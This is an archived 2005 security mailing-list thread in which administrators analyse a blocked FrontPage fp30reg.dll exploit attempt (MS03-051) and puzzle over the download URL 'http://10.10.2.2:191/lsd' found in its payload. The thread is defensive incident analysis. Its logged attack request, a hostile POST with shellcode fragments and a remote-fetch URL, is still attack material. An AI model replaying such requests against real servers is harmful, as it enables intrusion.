[WEB SECURITY] Frontpage Exploit - Strange POST Payload

Ryan Barnett rcbarnett at gmail.com
Tue Jun 21 14:29:43 EDT 2005


Yeah, that is the same vulnerability I included from the OVDB link.  I
know that the buffer overflow vulnerability has been around for
awhile, however I have not previously seen this exploit payload
before.

I had a brief email conversation with a colleague earlier today about
this.  The use of the internal IP address range along with a port
number could indicate a possible vector for internal host/port
scanning.  The only problem with this theory is that there was only
one request.  If there were numerous requests for more hosts or ports,
then this would seem more plausible.

Not quite sure what they were trying to accomplish with this one...

-- 
Ryan C. Barnett
Web Application Security Consortium (WASC) Member
CIS Apache Benchmark Project Lead
SANS Instructor: Securing Apache
GCIA, GCFA, GCIH, GSNA, GCUX, GSEC


On 6/21/05, Chris Weber <chris at lookout.net> wrote:
> Not answering your questions specifically but this looks like an attempt to
> exploit a pretty old vulnerability announced in MS03-051.
> 
> http://www.securiteam.com/windowsntfocus/6M00B0K8UE.html
> 
> 
> 
> -----Original Message-----
> From: Ryan Barnett [mailto:rcbarnett at gmail.com]
> Sent: Tuesday, June 21, 2005 7:20 AM
> To: Web Security
> Subject: [WEB SECURITY] Frontpage Exploit - Strange POST Payload
> 
> I received a Frontpage exploit
> (http://www.osvdb.org/displayvuln.php?osvdb_id=2952&Lookup=Lookup)
> attempt yesterday.  I get these types of probes all the time (as I am sure
> most of you do as well).  I normally filter these requests as I am not using
> Frontpage.  The reason that I took a look at this particular request log is
> that it triggered a Shellcode sig in Snort.
> 
> Since there was some binary data in the request, I piped it through strings.
> Here is the log entry -
> 
> ========================================
> Request: 66.161.76.150 - - [20/Jun/2005:23:31:11 --0400] "POST
> /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 403 743
> Handler: cgi-script
> ----------------------------------------
> POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1
> Host: 199.196.145.215
> Transfer-Encoding: chunked
> Content-Length: 1499
> mod_security-message: Access denied with code 403. Pattern match
> "/fp30reg\.dll" at THE_REQUEST
> mod_security-action: 403
> 1499
> Ehttp://10.10.2.2:191/lsd
> 080/lsd
> ,0F4
> %**f
> 
> HTTP/1.1 403 Forbidden
> ========================================
> 
> What was interesting was the POST payload of the request, specifically the
> URL - http://10.10.2.2:191/lsd.  Has anyone else seen this before?  Three
> questions that I have when looking at this -
> 
> 1) This appears to be an attempt to have my vulnerable server download
> something from a remote website.  If this is so, why the use of the
> non-routable IP address (10.10.X.X)?  My server wouldn't be able to get to
> the attacker's site...
> 
> 2) What about the use of port 191?  This port seems to be related to the
> propero service (by Cliff Neuman).  Does anyone know of any trojans that use
> this port?
> 
> 3) I am assuming that "/lsd" URI is a file for some form of malware.
> 
> Let me know if you have any insight into this exploit attempt.
> 
> Thanks.
> 
> --
> Ryan C. Barnett
> Web Application Security Consortium (WASC) Member CIS Apache Benchmark
> Project Lead SANS Instructor: Securing Apache GCIA, GCFA, GCIH, GSNA, GCUX,
> GSEC
> 
> ---------------------------------------------------------------------
> The Web Security Mailing List
> http://www.webappsec.org/lists/websecurity/
> 
> The Web Security Mailing List Archives
> http://www.webappsec.org/lists/websecurity/archive/
> 
>

---------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/



More information about the websecurity mailing list